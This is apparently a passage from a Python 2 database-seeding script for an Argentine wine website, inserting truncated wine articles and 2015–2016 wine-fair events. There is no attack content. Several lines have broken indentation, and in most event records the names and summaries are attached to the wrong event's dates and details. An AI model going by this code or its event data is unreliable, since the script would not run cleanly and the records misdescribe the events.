db.noticia.insert(titulo='¿ES CONVENIENTE PARA LAS BODEGAS EN ARGENTINA HACER VENTA DIRECTA ONLINE?',fecha=datetime.strptime('05/08/2016',fdate),cuerpo='El mundo de internet es atractivo, a veces no sabemos ni porque ni como, pero tenemos la convicción de que hay que decir presente de alguna manera. En honor a la verdad, en estos tiempos que corren, el concepto de fondo no es tan errado, hay que dec ...,',copete='El mundo de internet es atractivo, a veces no sabemos ni porque ni como, pero tenemos la convicción de que hay que decir presente de alguna manera. En honor a la verdad, en estos tiempos que corren, el concepto de fondo no es tan errado, hay que dec ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53605_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿QUÉ VINOS PROBAR PARA EMPEZAR A BEBER VINO?',fecha=datetime.strptime('02/08/2016',fdate),cuerpo='¿Sentís curiosidad pero no sabés por dónde empezar en el mundo del vino? En esta nota, una sencilla hoja de ruta y sus recomendados para llegar a amar al vino. Diarios, revistas y radios hablan de vinos con displicencia porque, como el teatro ...,',copete='¿Sentís curiosidad pero no sabés por dónde empezar en el mundo del vino? En esta nota, una sencilla hoja de ruta y sus recomendados para llegar a amar al vino. Diarios, revistas y radios hablan de vinos con displicencia porque, como el teatro ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53658_default_big.jpeg','rb'))
db.noticia.insert(titulo='12 INFOGRAFÍAS SOBRE MARIDAJE DEL VINO',fecha=datetime.strptime('29/07/2016',fdate),cuerpo='El maridaje es un arte cautivador donde se puede combinar, armonizar o acompañar, los distintos tipos de vino con los diferentes sabores gastronómicos con el fin de ensalzarlos. Es una experiencia singular para experimentar y disfrutar con los sent ...,',copete='El maridaje es un arte cautivador donde se puede combinar, armonizar o acompañar, los distintos tipos de vino con los diferentes sabores gastronómicos con el fin de ensalzarlos. Es una experiencia singular para experimentar y disfrutar con los sent ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53660_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS VINOS MÁS VENDIDOS DE ESPACIOVINO EN JULIO',fecha=datetime.strptime('27/07/2016',fdate),cuerpo='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Hey Malbec - PROMOCIÓN! Frutas ro ...,',copete='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Hey Malbec - PROMOCIÓN! Frutas ro ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53698_default_big.jpeg','rb'))
db.noticia.insert(titulo='CÓMO ENFRIAR EL VINO CORRECTAMENTE',fecha=datetime.strptime('25/07/2016',fdate),cuerpo='¿Debemos enfriar los vinos o se deben de beber a temperatura ambiente? ¿Cualquier método es el idóneo para que alcancen la temperatura correcta? Cuando un vino no se encuentra a su temperatura de consumo se debe de enfriar, incluido los vinos ti ...,',copete='¿Debemos enfriar los vinos o se deben de beber a temperatura ambiente? ¿Cualquier método es el idóneo para que alcancen la temperatura correcta? Cuando un vino no se encuentra a su temperatura de consumo se debe de enfriar, incluido los vinos ti ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53890_default_big.png','rb'))
db.noticia.insert(titulo='15 BOTELLEROS SUPER MODERNOS',fecha=datetime.strptime('22/07/2016',fdate),cuerpo='¿Has encontrado el botellero de tus sueños? Seguro que entre los siguientes inspiradores, originales, creativos, prácticos y sofisticados ejemplos, te quedas con alguno. 1. Como gotas de “Lluvia” Modelo “Lluvia” de Edgar Navarro ...,',copete='¿Has encontrado el botellero de tus sueños? Seguro que entre los siguientes inspiradores, originales, creativos, prácticos y sofisticados ejemplos, te quedas con alguno. 1. Como gotas de “Lluvia” Modelo “Lluvia” de Edgar Navarro ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54161_default_big.png','rb'))
db.noticia.insert(titulo='LAS 13 TIENDAS DE VINOS MÁS ESPECTACULARES DEL MUNDO',fecha=datetime.strptime('19/07/2016',fdate),cuerpo='Verdaderos templos del diseño que acogen los vinos del mundo con mimo, estilo, creatividad e innovación. Lugares de deleite y satisfacción, donde acercarse a buscar y elegir un caldo, supone todo un proceso de disfrute. 1. Budapest El est ...,',copete='Verdaderos templos del diseño que acogen los vinos del mundo con mimo, estilo, creatividad e innovación. Lugares de deleite y satisfacción, donde acercarse a buscar y elegir un caldo, supone todo un proceso de disfrute. 1. Budapest El est ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54255_default_big.png','rb'))
db.noticia.insert(titulo='5 TIPOS DE TAPONES DE VINO, SUS VENTAJAS E INCONVENIENTES',fecha=datetime.strptime('14/07/2016',fdate),cuerpo='¿Cuáles son los materiales utilizados en el tapón? ¿Por qué unos son más convenientes que otros? ¿Depende del tipo de vino? El tapón tiene la función de proteger de cualquier daño al vino hasta su consumo final. Incluso los hay que parti ...,',copete='¿Cuáles son los materiales utilizados en el tapón? ¿Por qué unos son más convenientes que otros? ¿Depende del tipo de vino? El tapón tiene la función de proteger de cualquier daño al vino hasta su consumo final. Incluso los hay que parti ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54484_default_big.jpeg','rb'))
db.noticia.insert(titulo='LAS 15 RAZONES POR LAS QUE EL VINO ES BUENO PARA LA SALUD',fecha=datetime.strptime('12/07/2016',fdate),cuerpo='¿Imaginabas que el vino pudiese aportar tantos beneficios? Además del homenaje a los sentidos que supone una copa de vino, permanecen en silencio un universo de propiedades conocidas desde la antigüedad, otras descubiertas gracias a los trabajos r ...,',copete='¿Imaginabas que el vino pudiese aportar tantos beneficios? Además del homenaje a los sentidos que supone una copa de vino, permanecen en silencio un universo de propiedades conocidas desde la antigüedad, otras descubiertas gracias a los trabajos r ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54493_default_big.jpeg','rb'))
db.noticia.insert(titulo='CÓMO ABRIR UNA BOTELLA DE VINO CORRECTAMENTE',fecha=datetime.strptime('07/07/2016',fdate),cuerpo='¿Es realmente tan complicado abrir una botella de vino? ¿Por qué nos sentimos a veces tímid@s de hacerlo? ¿Cada vino exige un sacacorchos diferente? ¿Existe una técnica orientativa de ayuda? Antes de aplicar los pasos para abrir la estupend ...,',copete='¿Es realmente tan complicado abrir una botella de vino? ¿Por qué nos sentimos a veces tímid@s de hacerlo? ¿Cada vino exige un sacacorchos diferente? ¿Existe una técnica orientativa de ayuda? Antes de aplicar los pasos para abrir la estupend ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54919_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS 12 AROMAS Y OLORES MÁS RAROS DEL VINO',fecha=datetime.strptime('04/07/2016',fdate),cuerpo='¿Olores empireumáticos, balsámicos o lácticos? Son algunos de los extraños aromas que están presentes en el vino. Notas sorprendentes, que nos ayudarán a comunicar las percepciones olfativas asociadas a olores de nuestro entorno más cercano. ...,',copete='¿Olores empireumáticos, balsámicos o lácticos? Son algunos de los extraños aromas que están presentes en el vino. Notas sorprendentes, que nos ayudarán a comunicar las percepciones olfativas asociadas a olores de nuestro entorno más cercano. ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54969_default_big.jpeg','rb'))
db.noticia.insert(titulo='6 TRUCOS PARA CONSERVAR UNA BOTELLA DE VINO ABIERTA',fecha=datetime.strptime('30/06/2016',fdate),cuerpo='¿Sabes mantener el vino una vez abierto? ¿Conoces las herramientas o las alternativas de ayuda? ¿Qué podemos hacer para conservarlo? En ocasiones, dudamos en abrir una botella de vino únicamente porque pensamos en tomar un par de copas y nos pre ...,',copete='¿Sabes mantener el vino una vez abierto? ¿Conoces las herramientas o las alternativas de ayuda? ¿Qué podemos hacer para conservarlo? En ocasiones, dudamos en abrir una botella de vino únicamente porque pensamos en tomar un par de copas y nos pre ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55308_default_big.jpeg','rb'))
db.noticia.insert(titulo='CUÁLES SON LAS NUEVAS PALABRAS USADAS PARA DESCRIBIR VINOS',fecha=datetime.strptime('28/06/2016',fdate),cuerpo='El vino cambió su estilo y un nuevo lenguaje gana forma. Si querés entender de qué hablan los enólogos cuando dice filo, tiza y nervio, lo que sigue es para vos. A la hora de probar un vino la lengua es clave. Sin embargo, es la otra lengua, la ...,',copete='El vino cambió su estilo y un nuevo lenguaje gana forma. Si querés entender de qué hablan los enólogos cuando dice filo, tiza y nervio, lo que sigue es para vos. A la hora de probar un vino la lengua es clave. Sin embargo, es la otra lengua, la ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55358_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS VINOS MÁS VENDIDOS DE ESPACIOVINO',fecha=datetime.strptime('23/06/2016',fdate),cuerpo='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Trumpeter Malbec - PROMOCIÓN! Rojo ...,',copete='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Trumpeter Malbec - PROMOCIÓN! Rojo ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55439_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS 6 CRITERIOS QUE DETERMINAN LA CALIDAD EN EL VINO',fecha=datetime.strptime('21/06/2016',fdate),cuerpo='Si pudieras ver en la etiqueta de un vino sus parámetros técnicos, para valorar su calidad ¿sabrías si son correctos? Catar el vino es siempre la mejor opción, pero podemos llegar un poco más allá si vemos los análisis organolépticos. Cuand ...,',copete='Si pudieras ver en la etiqueta de un vino sus parámetros técnicos, para valorar su calidad ¿sabrías si son correctos? Catar el vino es siempre la mejor opción, pero podemos llegar un poco más allá si vemos los análisis organolépticos. Cuand ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55470_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿CÓMO SE PUNTÚA UN VINO?',fecha=datetime.strptime('13/06/2016',fdate),cuerpo='¿Qué son las puntuaciones del vino? ¿Por qué existen diferentes sistemas de puntuación? ¿Quiénes son los gurús, expertos, las máximas autoridades responsables de estos sistemas? Ante la decisión de comprar un vino u otro, o bien nos guiamo ...,',copete='¿Qué son las puntuaciones del vino? ¿Por qué existen diferentes sistemas de puntuación? ¿Quiénes son los gurús, expertos, las máximas autoridades responsables de estos sistemas? Ante la decisión de comprar un vino u otro, o bien nos guiamo ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55731_default_big.jpeg','rb'))
db.noticia.insert(titulo='LAS MEJORES OPCIONES PARA REGALAR EL DÍA DEL PADRE ESTÁN EN ESPACIOVINO!',fecha=datetime.strptime('06/06/2016',fdate),cuerpo='Te invitamos a nuestra sección especialmente pensada para que que papá reciba el regalo que se merece en su día. Clickeando en cada una de las opciones podrás ver el precio promocionado. Aquí puedes ver toda nuestra selección= Si tu ...,',copete='Te invitamos a nuestra sección especialmente pensada para que que papá reciba el regalo que se merece en su día. Clickeando en cada una de las opciones podrás ver el precio promocionado. Aquí puedes ver toda nuestra selección= Si tu ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55887_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿CÓMO RECONOCER UN BUEN VINO DE UN MAL VINO?',fecha=datetime.strptime('03/06/2016',fdate),cuerpo='Entre las preguntas que todos nos hacemos sobre vino, esta es una de las más frecuentes. ¿Qué observar para no pifiarla? Todos conocemos a alguien que alguna vez, por maldad o dulce venganza, le cambió el vino a otro. Es la clásica= alguien tra ...,',copete='Entre las preguntas que todos nos hacemos sobre vino, esta es una de las más frecuentes. ¿Qué observar para no pifiarla? Todos conocemos a alguien que alguna vez, por maldad o dulce venganza, le cambió el vino a otro. Es la clásica= alguien tra ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55891_default_big.jpeg','rb'))
db.noticia.insert(titulo='DISECCIÓN DE UNA UVA',fecha=datetime.strptime('30/05/2016',fdate),cuerpo='Un vino es el resultado de muchos factores= la tierra, el clima, las técnicas de viticultura, la elaboración, las manos del enólogo…Todos ellos son relevantes pero sin duda es la uva la que determina las características del vino. El grano de ...',copete='Un vino es el resultado de muchos factores= la tierra, el clima, las técnicas de viticultura, la elaboración, las manos del enólogo…Todos ellos son relevantes pero sin duda es la uva la que determina las características del vino. El grano de ...',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55897_default_big.jpeg','rb'))
print 'inserts correctos'
except Exception as e:
print e
return True
def insertEventos():
    db.evento.truncate()
    from datetime import datetime
    fdate = '%d/%m/%Y'
    try:
        a()
        b()
        c()
    except Exception as e:
        print e
    return True
def insertPromociones():
    return True
def a():
    from datetime import datetime
    fdate = '%d/%m/%Y'
    try:
        db.evento.insert(
fecha=datetime.strptime('15/9/2016',fdate), fecha_fin=datetime.strptime('17/9/2016',fdate), precio='$250', direccion='La Rural, Predio Ferial de Buenos Aires', detalle='''Del 15 al 17 de septiembre, de 18 a 23hs. en el Pabellón Frers, La Rural recibe al mundo del vino en la decimosexta edición de la feria Vinos & Bodegas, un clásico que se renueva cada año para brindar a los visitantes una experiencia de disfrute única. Con las nuevas propuestas de más de 40 bodegas argentinas, catas guiadas, Dj´s, food trucks y mercado gourmet, este evento se consolida como el espacio de reunión por excelencia de los amantes del vino.
Vinos & Bodegas invita a descubrir en un mismo lugar y a través de un recorrido temático las distintas regiones productoras de vino: la ruta del Malbec, cepa emblemática de la argentina; la ruta del Torrontés, una variedad blanca autóctona con gran presencia en el norte del país; la ruta Crianza pensada para conocer y entender las distintas denominaciones que encontramos en las etiquetas; la ruta de variedades no tradicionales, que transportan al Tempranillo, la Bonarda y el Cabernet Franc y la ruta de Dulces y Espumantes, una categoría ideal para cocktails, postres y festejos. Todo un recorrido organizado por la Escuela de Sommeliers del Gato Dumas, quienes a su vez, ofrecerán catas guiadas y maridajes, a cargo de sommeliers de su staff.
Entre las bodegas que participan, se encuentran: Bodega Altus, Bodega Fabre, Finca Sophenia, Bodegas Bianchi, Bodega del Fin del Mundo, Casarena Bodega y Viñedos, Bodega Norton, Viña las Perdices, Domaine Bousquet, Chakana Wines, Bodega Domingo Hermano, RPB, Bodega Tapiz, Bodega Trivento, Huarpe Wine, Bodega Salentein, Bodega Santa Julia, Bodega La Memé, Antonio Mas, RJ Viñedos, Bodega Riglos, JLW Wines, Estancia Mendoza, Viñas de UCO, Pontilli Wines, Mendoza Vineyards, Don Héctor, Bodega La Rural, Bodega Patritti, Bodega Schroeder, Bodega Secreto Patagónico, Escorihuela y Grupo Monet.
Dentro de las novedades de esta edición se destaca el desafío Vinos & Bodegas Challenge, un concurso donde los asistentes podrán puntuar los vinos que van probando y así premiar a los favoritos. Mediante catas a ciegas podrán votar los vinos agrupados en diferentes categorías (mejor cepa, mejor relación precio/calidad, mejor blend, entre otras). Desarrollado por WineOn, la propuesta invitará a los visitantes a dar su opinión acerca de cada etiqueta.
Los más foodies también tendrán lugar en Vinos & Bodegas, con muy buenas propuestas gastronómicas de los Food Trucks de Los Petersen, Guapaletas y Chivitos Rex, entre otros. También podrán acceder al Mercado Gourmet, que ofrecerá productos orgánicos así como aquellos seleccionados especialmente para la ocasión.
Vinos & Bodegas es un evento social cuyo objetivo es que los consumidores puedan apreciar los vinos disfrutando de sus características, aromas y sabores, junto a la oferta gastronómica del sector de food trucks. En este sentido y fomentando un consumo moderado de alcohol a través del programa Wine in Moderation, cada asistente contará con 12 cupones de degustación, disfrutando así de un consumo responsable.
Organizadores: organiza Bodegas de Argentina y realiza La Rural S.A
Sede: La Rural, Predio Ferial de Buenos Aires, Pabellón Frers.
Ingresos: Av. Santa Fe 4363
Estacionamiento: Av. Sarmiento 2704 y Av. Cerviño 4476
Días: 15, 16 y 17 de septiembre
Horario: 18 a 23hs.
Valor de la entrada: $250.-. (Incluye 12 copas de degustación)
Más información en: www.expovinosybodegas.com.ar''', nombre = 'JUMBO DELI & WINE 2016',caracteristicas= ' Tribuna Plaza será la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su quinto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año. Una vez más ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18160_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('29/9/2016',fdate), fecha_fin=datetime.strptime('30/9/2016',fdate), direccion='Sheraton Mar del Plata Hotel', detalle='''Expo Di Vino, es un concepto de feria creado para cumplir, satisfacer y superar las expectativas comerciales de los expositores. Así también, fue diseñada para que toda persona del trade y el público especializado pueda disfrutar, bajo condiciones óptimas, de los mejores vinos de Argentina.''', nombre = 'SPARKLING NIGHTS 2016',caracteristicas= ' Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes. Esta será su octava edición. Durante 3 días, 35 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18166_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('12/8/2016',fdate), fecha_fin=datetime.strptime('14/8/2016',fdate), direccion='"Municipalidad de Bragado. Alsina 178, Bragado."', detalle='''En Agosto llega la undécima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires.
Expovinos Bragado continúa con su objetivo de acercar el mundo del vino y el buen vivir al interior del país, generando un espacio de disfrute, promoción y divulgación. Del 12 al 14 de Agosto, la undécima edición de la exposición de vinos más reconocida tendrá lugar en el Palacio Municipal de Bragado (Alsina 178, Bragado, Provincia de Buenos Aires).
Durante tres días los visitantes de Expovinos Bragado podrán disfrutar de las etiquetas de más de 20 bodegas, productos gourmet, aceites de oliva, un espacio de alta gama con etiquetas Premium, un almacén de promociones con importantes descuentos, muestras de arte y más.
Más información en: www.expovinosbragado.com.ar''', nombre = 'EXPO DI VINO',caracteristicas= ' Expo Di Vino, es un concepto de feria creado para cumplir, satisfacer y superar las expectativas comerciales de los expositores. Así también, fue diseñada para que toda persona del trade y el público especializado pueda disfrutar, bajo condicione ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18168_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('18/8/2016',fdate), fecha_fin=datetime.strptime('19/8/2016',fdate), precio='$400', direccion='"The Brick Hotel Buenos Aires (Posadas 1232),"', detalle='''Por primera vez, desembarca en la gran capital latinoamericana esta feria que reúne eitquetas súper top, elaboradas a partir de la sapiencia de enólogos renombrados.
La locación elegida es el sofisticado The Brick Hotel Buenos Aires (miembro de la colección de hoteles MGallery by Sofitel, de Accorhotels), en el corazón de Recoleta, frente al Patio Bullrich.
La organización estará a cargo de Augusto Saracco y César Moreno, en tándem con Javier Menajovsky (Wine Revolution).''', nombre = 'SEMINARIO DEL VINO ONLINE',caracteristicas= ' Con contenidos de alto interés para la gestión de la comunicación y el comercio digital, el lunes 26 de septiembre, de 8.30hs. a 18.00hs. tendrá lugar el Seminario del Vino Online en el Hotel Faena de Puerto Madero. En el encuentro s ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18176_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('30/6/2016',fdate), fecha_fin=datetime.strptime('30/6/2016',fdate), precio='$600', direccion='"La Bumón (Francisco Acuña de Figueroa 1800, CABA),"', detalle='''Inédito encuentro entre salientes Productores Independientes de Paraje Altamira (PiPA), que desembarcan con sus interesantísimas etiquetas en Buenos Aires. Será una excelente oportunidad para descubrir bondades y secretos de este rincón especial del Valle de Uco mendocino.
La propuesta contará con más de 30 vinos (partidas limitadas, súper cuidadas), cuyo valor parte de los $250. Lo más jugoso será la presencia de propietarios y winemakers, que interactuarán de manera muy distendida con el público.
Atención: solo hay 70 lugares disponibles. ¿Qué bodegas darán el presente? Altos las Hormigas, Chakana, Fincas Adrián Río, Finca Beth, Finca La Igriega, Finca Las Glicinas, Finca Suarez, Lupa, Son Vida, Teho y Traslapiedra.Paraje Altamira.
La buena noticia es que habrá un maridaje para el churrete con exquisiteces de La Bumón, la nueva apuesta gastronómica de la city.
Reservas: entradas@parajealtamira.org''', nombre = 'VINOS & BODEGAS 2016',caracteristicas= ' Del 15 al 17 de septiembre, de 18 a 23hs. en el Pabellón Frers, La Rural recibe al mundo del vino en la decimosexta edición de la feria Vinos & Bodegas, un clásico que se renueva cada año para brindar a los visitantes una experiencia de disfrute ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18177_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('23/11/2016',fdate), fecha_fin=datetime.strptime('25/11/2016',fdate), precio='$450', direccion='"Tribuna Plaza, Av. Del Libertador 4401, Palermo"', detalle='''Tribuna Plaza será la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su quinto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año.
Una vez más disfrutar es la consigna; Jumbo Deli & Wine invita a quienes la visiten a sumergirse en diferentes espacios gourmet que prometen el maridaje ideal y un ambiente perfecto para vivir una experiencia única. Exquisitos vinos, deliciosos fiambres y quesos, carnes, panes, productos gourmet, cervezas, espirituosas, destilados, café y chocolates, son los sabores que se podrán degustar en la quinta edición de la Feria.
Datos sobre la Feria Jumbo Deli & Wine
Fecha: 23, 24 y 25 de noviembre
Lugar: Tribuna Plaza, Av. Del Libertador 4401, Palermo
Horario: 18 hs. a 22 hs.
Valor de la entrada: $450
Más información en: www.jumbodeliandwine.com.ar''', nombre = 'ALTA GAMA BUENOS AIRES',caracteristicas= ' Por primera vez, desembarca en la gran capital latinoamericana esta feria que reúne eitquetas súper top, elaboradas a partir de la sapiencia de enólogos renombrados. La locación elegida es el sofisticado The Brick Hotel Buenos Aires (miembro d ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18178_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('26/9/2016',fdate), fecha_fin=datetime.strptime('26/9/2016',fdate), precio='1800', direccion='Hotel Faena, Martha Salotti 445, CABA.', detalle='''Con contenidos de alto interés para la gestión de la comunicación y el comercio digital, el lunes 26 de septiembre, de 8.30hs. a 18.00hs. tendrá lugar el Seminario del Vino
Online en el Hotel Faena de Puerto Madero.
En el encuentro se darán a conocer los resultados de la investigación “Radiografía del
Vino Online en la Argentina”, realizada por Consultora Stg, que devela el perfil del
consumidor argentino de vinos, su comportamiento y hábitos en la web.
Hoy es fundamental saber a quién nos dirigimos cuando comunicamos por Internet, las
nuevas demandas y tendencias del mercado, como también casos exitosos de e-
commerce y comunicación online. Oradores destacados como Lis Clement, Directora
de la agencia Foster Newton y ex Gerente de Marketing de WofA, Jonny Dayán, CEO
de Tonel Privado, Sebastián Balbo, Manager de E-commerce y Marketing Digital de
Tonel Privado, Gonzalo Peña, ¡Socio-Gerente de Oh! Panel y Master en Investigación
de Opinión Pública, Pablo Santos, Director del proyecto VinoApp y Gerente de
Marketing de Xsi Latam, y Dolores Lavaque, Directora de Consultora Stg y Master del
Wine MBA de la Bordeaux Business School, entre otros, nos ayudarán a entender en
detalle insights, nuevas demandas, tendencias del mercado y casos exitosos de e-
commerce y de comunicación online del vino.
Inscripción: http://www.consultorastg.com/esp/eventos''', nombre = 'EXPOVINOS BRAGADO 2016',caracteristicas= ' En Agosto llega la undécima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires. Expovinos Bragado continúa con su objetivo de ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18182_default_medium.jpeg','rb'))
        db.evento.insert(
fecha=datetime.strptime('4/4/2016',fdate), fecha_fin=datetime.strptime('10/4/2016',fdate), precio='200', direccion='"Ciudad de Buenos Aires"', detalle='''4 al 10 de abril, con un despliegue de diferentes actividades en la Ciudad de Buenos Aires.
Para asistir a esta celebración, habrá una entrada que dará acceso a todas las actividades y se hará a beneficio del Hospital de Niños Dr. Ricardo Gutiérrez, de $200, en forma anticipada, y de $250 in situ."''', nombre = 'CAMINOS Y SABORES 2016',caracteristicas= ' Caminos y Sabores, a lo largo de sus once ediciones, se ha convertido en una de las ferias de mayor crecimiento, potenciando a su vez el desarrollo de todos sus protagonistas: productores de alimentos típicos, artesanos y representantes de destinos ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18232_default_medium.png','rb'))
        db.evento.insert(
fecha=datetime.strptime('15/2/2016',fdate), fecha_fin=datetime.strptime('19/2/2016',fdate), direccion='Ciudad de Mendoza', detalle='''Planeado para evaluar y premiar la calidad y los avances de la industria vitivinícola argentina, el Argentina Wine Awards ha ganado su lugar como el certamen más importante en la agenda local y gana cada vez más adeptos de otros rincones del mundo del vino. El año pasado participaron más de 669 vinos en el concurso.
Con el propósito de reflejar la proliferación de los vinos argentinos en todo el mundo y la importancia cada vez mayor de una variedad de mercados, se seleccionó un jurado que no sólo representa a diversos países y nacionalidades sino que también cuenta con un vasto conocimiento sobre la industria mundial. En esta edición, el panel Internacional estará compuesto por especialistas internacionales que han contribuido al crecimiento de la industria vitivinícola argentina bajo el concepto: 10 YEARS CREATING THE FUTURE.
Tal como se ha hecho durante este el 2015, Wines of Argentina incluirá todos los vinos ganadores de los Trophy y Oro en sus actividades de promoción en el exterior para demostrar la alta calidad de los vinos de la Argentina.
Las degustaciones del certamen tendrán lugar en Mendoza, del 15 al 19 de febrero de 2016.''', nombre = 'PIPA',caracteristicas= ' Inédito encuentro entre salientes Productores Independientes de Paraje Altamira (PiPA), que desembarcan con sus interesantísimas etiquetas en Buenos Aires. Será una excelente oportunidad para descubrir bondades y secretos de este rincón especial ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18253_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('18/11/2015',fdate), fecha_fin=datetime.strptime('20/11/2015',fdate), precio='$399', direccion='Tribuna Plaza, Av. Del Libertador 4401, Palermo', detalle='''Tribuna Plaza será nuevamente la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su cuarto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año.
Una vez más disfrutar es la consigna; Jumbo Deli & Wine invita a quienes la visiten a sumergirse en diferentes espacios gourmet que prometen el maridaje ideal y un ambiente perfecto para vivir una experiencia única. Exquisitos vinos, deliciosos fiambres y quesos, carnes, panes, productos gourmet, cervezas, espirituosas, destilados, café y chocolates, son los sabores que se podrán degustar en la cuarta edición de la Feria.
Con una ambientación distinguida y original, transportará a los invitados a la época del Gran Gatsby de los años 30. Jumbo Deli & Wine 2015 reúne a las marcas más prestigiosas que, con sus mejores propuestas gourmet, hacen deleitar a los argentinos.
Como destacado, este año la Feria incorpora un nuevo espacio, Jumbo Fresh donde la marca presentará y dará a degustar sus productos de elaboración propia y se podrán saborear los panes más exclusivos de Jumbo: sticks, saborizados, panes de queso, focaccia de salmón, entre otros. También, en ese mismo stand, se lucirán las distintas variedades de frutas y verduras donde se degustarán dips de zanahoria, apio y morrón; pinchos de tomate cherry y fruta recién cortada; además de las carnes Premium de Jumbo. Jumbo Fresh ofrece productos frescos todos los días del año.
Jumbo Deli & Wine 2015, sabores, placeres, experiencias y momentos para descubrir y dejarse sorprender. Todo en un solo lugar. Más información en www.jumbodeliandwine.com.ar
Datos sobre la Feria Jumbo Deli & Wine
Fecha: 18, 19 y 20 de noviembre
Lugar: Tribuna Plaza, Av. Del Libertador 4401, Palermo
Horario: 18 hs. a 23 hs.
Valor de la entrada: $399"''', nombre = 'LA SEMANA DEL MALBEC',caracteristicas= ' 4 al 10 de abril, con un despliegue de diferentes actividades en la Ciudad de Buenos Aires. Para asistir a esta celebración, habrá una entrada que dará acceso a todas las actividades y se hará a beneficio del Hospital de Niños Dr. Ricardo Gut ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18313_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('7/7/2016',fdate), fecha_fin=datetime.strptime('10/7/2016',fdate), precio='$110', direccion='La Rural, Predio Ferial de Buenos Aires.', detalle='''Caminos y Sabores, a lo largo de sus once ediciones, se ha convertido en una de las ferias de mayor crecimiento, potenciando a su vez el desarrollo de todos sus protagonistas: productores de alimentos típicos, artesanos y representantes de destinos turísticos. En la última edición, la feria convocó a más de 80.000 personas que disfrutaron del recorrido por el mercado, de las demostraciones de cocina, disertaciones y espectáculos artísticos.
Lo que hay que saber
DATOS GENERALES:
• Fecha: del jueves 7 al domingo 10 de julio
• Horario: de 12 a 21hs.
• Lugar: La Rural, Predio Ferial de Buenos Aires – Ciudad Autónoma de Buenos Aires.
• Ingreso: por Av. Sarmiento 2704.
VALOR DE LA ENTRADA
• Entrada general $ 110
• Entrada general con Catálogo de Expositores $ 150
• Entrada Plus: $250 - ¡Numerosos beneficios pensados para vos!
• Todos los días: Menores de 5 años –acompañados por un mayor- no abonan entrada.
Más información: http://www.caminosysabores.com.ar/ ''', nombre = 'RALLY DE LAS BODEGAS "COPA PARK HYATT" 2016',caracteristicas= ' El Rally de la Bodegas en su 14ª Edición consecutiva, organizado por el CLUB MENDOZA CLÁSICOS & SPORT es uno de los eventos de mayor importancia de autos históricos del país. Comenzó una nueva etapa con el acuerdo alcanzado con CLARAMUNT GARAG ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18357_default_medium.jpeg','rb'))
except Exception as e:
print e
